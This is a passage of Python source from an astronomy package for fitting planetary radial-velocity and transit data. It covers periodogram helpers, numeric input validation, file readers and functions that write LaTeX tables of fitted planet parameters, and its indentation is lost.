if len(obj.fit_results.rv_model.jd) > 5:
RV_per = gls.Gls((obj.fit_results.rv_model.jd, obj.fit_results.rv_model.rvs, obj.fit_results.rv_model.rv_err),
fast=True, verbose=False, norm='ZK',ofac=10, fbeg=omega[-1], fend=omega[0],)
obj.gls = RV_per
else:
return obj
return obj
def run_gls_o_c(obj,fend =1.0,fbeg=10000, as_main = False):
#fbeg = abs(max(obj.fit_results.rv_model.jd)-min(obj.fit_results.rv_model.jd)) * 2.0
omega = 1/ np.logspace(np.log10(fend), np.log10(fbeg), num=int(1000))
if len(obj.fit_results.rv_model.jd) > 5:
RV_per_res = gls.Gls((obj.fit_results.rv_model.jd, obj.fit_results.rv_model.o_c, obj.fit_results.rv_model.rv_err),
fast=True, verbose=False, norm='ZK', ofac=10, fbeg=omega[-1], fend=omega[0],)
if as_main == False:
obj.gls_o_c = RV_per_res
elif as_main == True:
obj.gls = RV_per_res
else:
return obj
return obj
def is_float(n):
'''
Given a string n, verify whether it expresses a valid float.
n is cast to a string in case a float-like object is passed instead.
'''
return re.match(r'^-?\d*(\.\d+)?(E-?\d+)?$', str(n))
# Given a float or string, verify whether it expresses an integer. Optionally, lower and upper bounds can be imposed, and the inequality on either side can be strict or weak.
def is_int(s,bounded=[False,False],bounds=[0,0],equal=[False,False]):
if is_float(s): # if it is an int, it is certainly float as well
n=float(s) # we need n as a number, not as a string, for comparisons with bounds later
is_an_int=float(s).is_integer()
else:
is_an_int=False
# is_an_int now contains an information if s is an int, but without bounds. Let's introduce bounds:
if(is_an_int): # if it's not an int at all we don't need to check any further
if(bounded[0]): # if there is a lower bound let's apply it
if (n<bounds[0] or (not equal[0] and n==bounds[0])):
is_an_int=False
if(is_an_int): # if the lower bound returned False we don't need to check any further
if(bounded[1]): # if there is an upper bound let's apply it
if (n>bounds[1] or (not equal[1] and n==bounds[1])):
is_an_int=False
return is_an_int
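# Hedged examples (arbitrary values) of the bounded integer check defined above.
def _example_is_int():
    a = is_int("7")                                           # True: plain integer
    b = is_int("7.5")                                         # False: not an integer
    c = is_int("5", bounded=[True, True], bounds=[0, 10],
               equal=[True, True])                            # True: 0 <= 5 <= 10
    d = is_int("0", bounded=[True, False], bounds=[0, 0],
               equal=[False, False])                          # False: strict lower bound at 0
    return a, b, c, d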
# If save_wrong_lines is enabled we will save a string 'wrong_line' instead of this line and save indices at which this occurred, otherwise we will skip this line
def convert_array_to_float(a,save_wrong_lines=False):
converting_warnings=Warning_log([],'Converting array to float')
b=[]
if (save_wrong_lines):
wrong_indices=[]
for i in range(len(a)):
if not is_float(a[i]):
if not (save_wrong_lines):
converting_warnings.update_warning_list('Array passed to convert_array_to_float function should only contain floats! Line %d skipped'%(i+1))
else:
b.append('wrong_line')
wrong_indices=np.concatenate((wrong_indices,np.atleast_1d(i)))
else:
b.append(float(a[i]))
converting_warnings.print_warning_log()
if (save_wrong_lines):
return np.array(b),wrong_indices
else:
return np.array(b)
def convert_array_to_int(a, save_wrong_lines=False):
converting_warnings=Warning_log([],'Converting array to int')
b=[]
if (save_wrong_lines):
wrong_indices=[]
for i in range(len(a)):
if not is_int(a[i]):
if not (save_wrong_lines):
converting_warnings.update_warning_list('Array passed to convert_array_to_int function should only contain ints! Line %d skipped'%(i+1))
else:
b.append('wrong_line')
wrong_indices=np.concatenate((wrong_indices,np.atleast_1d(i)))
else:
b.append(int(a[i]))
converting_warnings.print_warning_log()
if (save_wrong_lines):
return np.array(b),wrong_indices
else:
return np.array(b)
#for convenient reading of the input file
def read_file_as_array_of_arrays(inputfile):
a=open(inputfile, 'r')
b=a.readlines() # b as array of strings
a.close()
c=[]
ic=0 # iterator for values in c
for i in range(len(b)):
b[i]=np.atleast_1d(b[i].split()) # turn a row of b into an array of arrays
c.append([]) # need to make a separate array so every element is of correct type
# convert each string that represents a float into float
for j in range(0,len(b[i])):
if (is_float(b[i][j])):
c[ic].append(float(b[i][j]))
elif not (b[i][j][-1]==':'): # ignore comments, which can be placed by the user as strings ending with a colon; use underscores instead of spaces inside comments or an error will arise
c[ic].append(b[i][j])
ic=ic+1
#c = np.array(c, dtype=float)
return c
# for convenient reading of the input file; this second version is a hack that skips the first (mcmc lnL) column of each row. To be fixed.
def read_file_as_array_of_arrays_mcmc(inputfile):
a=open(inputfile, 'r')
b=a.readlines() # b as array of strings
a.close()
c=[]
ic=0 # iterator for values in c
for i in range(len(b)):
b[i]=np.atleast_1d(b[i].split()) # turn a row of b into an array of arrays
c.append([]) # need to make a separate array so every element is of correct type
# convert each string that represents a float into float
for j in range(1,len(b[i])):
if (is_float(b[i][j])):
c[ic].append(float(b[i][j]))
elif not (b[i][j][-1]==':'): # ignore comments, which can be placed by the user as strings ending with a colon; use underscores instead of spaces inside comments or an error will arise
c[ic].append(float(b[i][j]))
ic=ic+1
c = np.array(c, dtype=float)
return c
def verify_array_with_bounds(ar,bounds):
'''Verify whether the values of array ar fit within the declared bounds; if there are too many/too few bounds, check as many values as possible'''
if (len(ar)<=len(bounds)):
num=len(ar) # number of values to check
elif (len(ar)>len(bounds)):
num=len(bounds) # number of values to check
verification=True # initial value
for i in range(num):
# check if some of the values doesn't fit in the bounds, if so return False
if (ar[i]<bounds[i][0] or ar[i]>bounds[i][1]):
verification=False
break
return verification
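# Hedged sketch (arbitrary values): each entry of 'values' is checked against the
# corresponding [lower, upper] pair; any value outside its bounds makes the result False.
def _example_verify_bounds():
    values = [0.2, 5.0, 30.0]
    bounds = [[0.0, 1.0], [0.0, 10.0], [0.0, 360.0]]
    return verify_array_with_bounds(values, bounds)   # -> True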
def latex_pl_param_table(obj, width = 10, precision = 2, asymmetric = False, file_name='test.tex', path='./', return_text=False):
if asymmetric != True:
text = '''
\\begin{table}[ht]
% \\begin{adjustwidth}{-4.0cm}{}
% \\resizebox{0.69\\textheight}{!}
% {\\begin{minipage}{1.1\\textwidth}
\centering
\caption{{}}
\label{table:}
\\begin{tabular}{lrrrrrrrr} % 2 columns
\hline\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''Parameter \hspace{0.0 mm}'''
for i in range(obj.npl):
text = text + '''& Planet %s '''%chr(98+i)
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
text = text + '''{0:{width}s}'''.format("$K$ [m\,s$^{-1}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i], max(np.abs(obj.param_errors.planet_params_errors[7*i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$P$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +1], max(np.abs(obj.param_errors.planet_params_errors[7*i +1])), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.hkl == False:
text = text + '''{0:{width}s}'''.format("$e$ ", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +2], max(np.abs(obj.param_errors.planet_params_errors[7*i +2])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +3], max(np.abs(obj.param_errors.planet_params_errors[7*i +3])), width = width, precision = precision)
text = text + '''\\\\
'''
else:
text = text + '''{0:{width}s}'''.format("$e sin(\omega)$ ", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.e_sinw[i], max(np.abs(obj.e_sinw_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$e cos(\omega)$", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.e_cosw[i], max(np.abs(obj.e_cosw_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
if obj.hkl == False:
text = text + '''{0:{width}s}'''.format("$M_{\\rm 0}$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +4], max(np.abs(obj.param_errors.planet_params_errors[7*i +4])), width = width, precision = precision)
text = text + '''\\\\
'''
else:
text = text + '''{0:{width}s}'''.format("$\lambda$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.lamb[i], max(np.abs(obj.lamb_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.mod_dynamical == True:
text = text + '''{0:{width}s}'''.format("$i$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +5], max(np.abs(obj.param_errors.planet_params_errors[7*i +5])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\Omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +6], max(np.abs(obj.param_errors.planet_params_errors[7*i +6])), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"] == True:
text = text + '''{0:{width}s}'''.format("$t_{\\rm 0}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.t0[i], max(np.abs(obj.t0_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Rad. [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.pl_rad[i], max(np.abs(obj.pl_rad_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$a$ [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.pl_a[i], max(np.abs(obj.pl_a_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$a$ [au]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.fit_results.a[i], 0, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$m \sin i$ [$M_{\\rm jup}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.fit_results.mass[i], 0, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$t_{\omega}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format((float(obj.epoch) - (np.radians(obj.params.planet_params[7*i + 4])/(2*np.pi))*obj.params.planet_params[7*i + 1] ), 0, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"]== True:
text = text + '''{0:{width}s}'''.format("RV lin. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.params.linear_trend),float(max(np.abs(obj.param_errors.linear_trend_error))) , width = 30, precision = 6)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("RV quad. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.rv_quadtr),float(max(np.abs(obj.rv_quadtr_err))) , width = 30, precision = 6)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.params.offsets[i]), float(max(np.abs(obj.param_errors.offset_errors[i]))), width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.params.jitters[i]), float(max(np.abs(obj.param_errors.jitter_errors[i]))), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"]== True:
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm off}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.tra_off[i]), float(max(np.abs(obj.tra_off_err[i]))), width = width, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm jit}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.tra_jitt[i]), float(max(np.abs(obj.tra_jitt_err[i]))), width = width, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.doGP == True:
if obj.gp_kernel == 'RotKernel':
for i in range(4):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_rot_str[i]), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.GP_rot_params[i]), float(max(np.abs(obj.param_errors.GP_params_errors[i]))), width = width, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
elif obj.gp_kernel == 'SHOKernel':
for i in range(3):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_sho_str[i]), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.GP_sho_params[i]), float(max(np.abs(obj.param_errors.GP_params_errors[i]))), width = width, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\chi^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\chi_{\\nu}^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.reduced_chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$rms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.rms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$wrms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.wrms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$-\ln\mathcal{L}$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.loglik), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("N$_{\\rm RV}$ data", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(len(obj.fit_results.jd), width = width, precision = 0)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Epoch", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(obj.epoch, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''
\end{tabular}
% \end{minipage}}
% \end{adjustwidth}
%\\tablefoot{\small }
\end{table}
'''
elif asymmetric == True:
text = '''
\\begin{table}[ht]
% \\begin{adjustwidth}{-4.0cm}{}
% \\resizebox{0.69\\textheight}{!}
% {\\begin{minipage}{1.1\\textwidth}
\centering
\caption{{}}
\label{table:}
\\begin{tabular}{lrrrrrrrr} % 2 columns
\hline\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''Parameter \hspace{0.0 mm}'''
for i in range(obj.npl):
text = text + '''& Planet %s '''%chr(98+i)
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
text = text + '''{0:{width}s}'''.format("$K$ [m\,s$^{-1}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i], obj.param_errors.planet_params_errors[7*i][0], obj.param_errors.planet_params_errors[7*i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$P$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +1], obj.param_errors.planet_params_errors[7*i +1][0], obj.param_errors.planet_params_errors[7*i +1][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.hkl == False:
text = text + '''{0:{width}s}'''.format("$e$ ", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +2], obj.param_errors.planet_params_errors[7*i +2][0], obj.param_errors.planet_params_errors[7*i +2][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +3], obj.param_errors.planet_params_errors[7*i +3][0], obj.param_errors.planet_params_errors[7*i +3][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
else:
text = text + '''{0:{width}s}'''.format("$e sin(\omega)$ ", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$'''.format(obj.e_sinw[i], obj.e_sinw_err[i][0], obj.e_sinw_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$e cos(\omega)$", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$'''.format(obj.e_cosw[i], obj.e_cosw_err[i][0], obj.e_cosw_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
if obj.hkl == False:
text = text + '''{0:{width}s}'''.format("$M_{\\rm 0}$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +4], obj.param_errors.planet_params_errors[7*i +4][0], obj.param_errors.planet_params_errors[7*i +4][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
else:
text = text + '''{0:{width}s}'''.format("$\lambda$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.lamb[i], obj.lamb_err[i][0], obj.lamb_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\
'''
if obj.mod_dynamical == True:
text = text + '''{0:{width}s}'''.format("$i$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +5], obj.param_errors.planet_params_errors[7*i +5][0], obj.param_errors.planet_params_errors[7*i +5][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\Omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +6], obj.param_errors.planet_params_errors[7*i +6][0], obj.param_errors.planet_params_errors[7*i +6][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.type_fit["Transit"] == True:
text = text + '''{0:{width}s}'''.format("$t_{\\rm 0}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.t0[i], obj.t0_err[i][0], obj.t0_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("Rad. [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.pl_rad[i], obj.pl_rad_err[i][0], obj.pl_rad_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$a$ [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.pl_a[i], obj.pl_a_err[i][0], obj.pl_a_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$a$ [au]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.fit_results.a[i], 0,0, width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$m \sin i$ [$M_{\\rm jup}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.fit_results.mass[i], 0,0, width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$t_{\omega}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format((float(obj.epoch) - (np.radians(obj.params.planet_params[7*i + 4])/(2*np.pi))*obj.params.planet_params[7*i + 1] ), 0,0, width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.type_fit["RV"]== True:
text = text + '''{0:{width}s}'''.format("RV lin. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.params.linear_trend),float(obj.param_errors.linear_trend_error[0]),float(obj.param_errors.linear_trend_error[1]) , width = width, width2 = 0, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("RV quad. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.rv_quadtr),float(obj.rv_quadtr_err[0]),float(obj.rv_quadtr_err[1]) , width = width, width2 = 0, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.params.offsets[i]), obj.param_errors.offset_errors[i][0], obj.param_errors.offset_errors[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.params.jitters[i]), obj.param_errors.jitter_errors[i][0], obj.param_errors.jitter_errors[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.type_fit["Transit"]== True:
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm off}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.tra_off[i]), obj.tra_off_err[i][0], obj.tra_off_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm jit}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.tra_jitt[i]), obj.tra_jitt_err[i][0], obj.tra_jitt_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.doGP == True:
if obj.gp_kernel == 'RotKernel':
for i in range(4):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_rot_str[i]), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.GP_rot_params[i]), obj.param_errors.GP_params_errors[i][0], obj.param_errors.GP_params_errors[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
elif obj.gp_kernel == 'SHOKernel':
for i in range(3):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_sho_str[i]), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.GP_sho_params[i]), obj.param_errors.GP_params_errors[i][0], obj.param_errors.GP_params_errors[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\chi^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\chi_{\\nu}^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.reduced_chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$rms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.rms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$wrms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.wrms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$-\ln\mathcal{L}$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.loglik), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("N$_{\\rm RV}$ data", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(len(obj.fit_results.jd), width = width, precision = 0)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Epoch", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(obj.epoch, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''
\end{tabular}
% \end{minipage}}
% \end{adjustwidth}
%\\tablefoot{\small }
\end{table}
'''
else:
print("asymmetric must be True or False")
return
if return_text == True:
return text
else:
table_file = open(file_name, 'w')
table_file.write(text)
table_file.close()
print("Done")
return
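# Usage sketch for latex_pl_param_table (illustrative; 'fit' stands for an already-fitted
# object of the kind passed around in this module, and 'best_fit_table.tex' is a
# hypothetical output name).
def _example_pl_param_table(fit):
    """Write a symmetric-error best-fit parameter table. Never called anywhere."""
    latex_pl_param_table(fit, width=10, precision=3, asymmetric=False,
                         file_name='best_fit_table.tex')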
def latex_prior_table(obj, width = 10, precision = 2, file_name='prior_table.tex', path='./', return_text = False):
text = '''
\\begin{table}[ht]
